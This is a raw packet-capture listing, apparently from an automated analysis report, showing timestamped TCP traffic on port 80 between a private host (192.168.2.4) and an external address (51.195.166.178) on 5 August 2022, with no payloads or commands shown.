Aug 5, 2022 13:54:13.346232891 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.346239090 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.346268892 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.346297979 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.346298933 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.346328020 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.346329927 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.346359968 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.346366882 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.346379995 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.346391916 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.346410036 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.346424103 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.346452951 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.346477032 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.346484900 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.346512079 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.346514940 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.346546888 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.346550941 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.346564054 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.346577883 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.346607924 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.346632957 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.346637964 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.346664906 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.346668959 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.346697092 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.346698999 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.346724987 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.346731901 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.346761942 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.346781969 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.346791029 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.346822023 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.346822023 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.346854925 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.346854925 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.346873999 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.346885920 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.346918106 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.346941948 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.346947908 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.346976995 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.346977949 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.347006083 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.347007990 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.347038031 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.347064018 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.347067118 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.347093105 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.347125053 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.376276970 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.376310110 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.376332998 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.376358986 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.376383066 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.376406908 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.376424074 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.376440048 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.376451015 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.376462936 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.376487970 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.376511097 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.376537085 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.376557112 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.376560926 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.376585007 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.376621008 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.376629114 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.376646042 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.376673937 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.376698017 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.376720905 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.376817942 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.376835108 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.376840115 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.376864910 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.376877069 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.376885891 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.376888990 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.376914024 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.376938105 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.376936913 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.376960993 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.376983881 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.377006054 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.377017021 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.377031088 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.377054930 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.377075911 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.377099037 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.377120972 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.377142906 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.377142906 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.377166986 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.377167940 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.377173901 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.377191067 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.377214909 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.377238035 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.377253056 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.377259970 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.377284050 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.377307892 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.377330065 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.377340078 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.377353907 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.377377987 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.377383947 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.377402067 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.377425909 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.377429962 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.377448082 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.377471924 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.377495050 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.377520084 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.377537966 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.377543926 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.377567053 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.377590895 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.377614975 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.377635956 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.377640009 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.377660036 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.377682924 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.377706051 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.377706051 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.377729893 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.377753019 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.377770901 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.377785921 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.377809048 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.377811909 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.377831936 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.377855062 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.377877951 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.377891064 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.377901077 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.377923965 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.377947092 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.377954006 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.377970934 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.377994061 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.377996922 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.378017902 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.378041983 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.378051996 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.378067970 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.378093004 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.378110886 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.378148079 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.378169060 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.378173113 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.378196001 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.378216982 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.378218889 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.378242016 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.378263950 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.378287077 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.378309965 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.378310919 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.378333092 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.378356934 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.378379107 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.378401995 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.378403902 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.378426075 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.378448009 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.378468037 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.378473997 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.378499031 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.378521919 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.378529072 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.378556013 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.378576040 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.378581047 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.378604889 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.378618002 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.378643036 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.378654957 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.378664017 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.378670931 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.378678083 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.378693104 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.378716946 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.378740072 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.378762960 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.378763914 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.378786087 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.378808975 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.378832102 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.378833055 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.378855944 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.378880024 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.378901958 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.378906965 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.378925085 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.378947973 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.378968000 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.378978968 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.378990889 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.379014015 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.379033089 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.379038095 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.379060984 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.379082918 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.379105091 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.379106045 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.379127026 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.379148960 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.379172087 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.379179001 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.379201889 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.379210949 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.379220963 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.379234076 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.379252911 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.379334927 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.379396915 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.408694983 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.408759117 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.408801079 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.408842087 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.408885002 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.408885002 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.408924103 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.408930063 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.408972979 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.408998966 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.409015894 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.409018040 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.409049988 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.409058094 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.409070969 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.409101009 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.409126997 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.409142971 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.409168959 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.409185886 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.409193039 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.409234047 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.409238100 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.409259081 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.409296989 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.409303904 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.409332991 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.409347057 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.409373045 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.409394026 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.409403086 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.409445047 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.409465075 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.409486055 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.409495115 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.409528017 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.409583092 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.409605980 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.409626007 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.409648895 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.409687996 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.409728050 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.409785986 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.409828901 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.409842968 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.409852982 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.409892082 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.409900904 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.409933090 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.409946918 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.409974098 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.409975052 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.410018921 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.410062075 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.410062075 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.410104990 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.410105944 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.410145044 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.410152912 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.410185099 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.410186052 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.410228014 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.410269976 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.410269976 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.410310030 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.410312891 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.410355091 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.410381079 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.410401106 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.410614967 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.410656929 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.410697937 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.410736084 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.410762072 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.410777092 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.410779953 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.410789013 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.410829067 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.410866976 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.410883904 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.410907984 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.410911083 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.410945892 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.410952091 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.410984039 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.410988092 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.411027908 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.411032915 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.411072016 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.411093950 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.411112070 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.411123991 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.411142111 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.411163092 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.411164999 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.411176920 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.411180019 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.411187887 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.411200047 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.411214113 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.411220074 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.411238909 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.411243916 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.411257029 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.411262989 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.411277056 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.411293983 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.411295891 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.411314011 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.411322117 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.411333084 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.411354065 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.411362886 CEST	80	49778	51.195.166.178	192.168.2.4
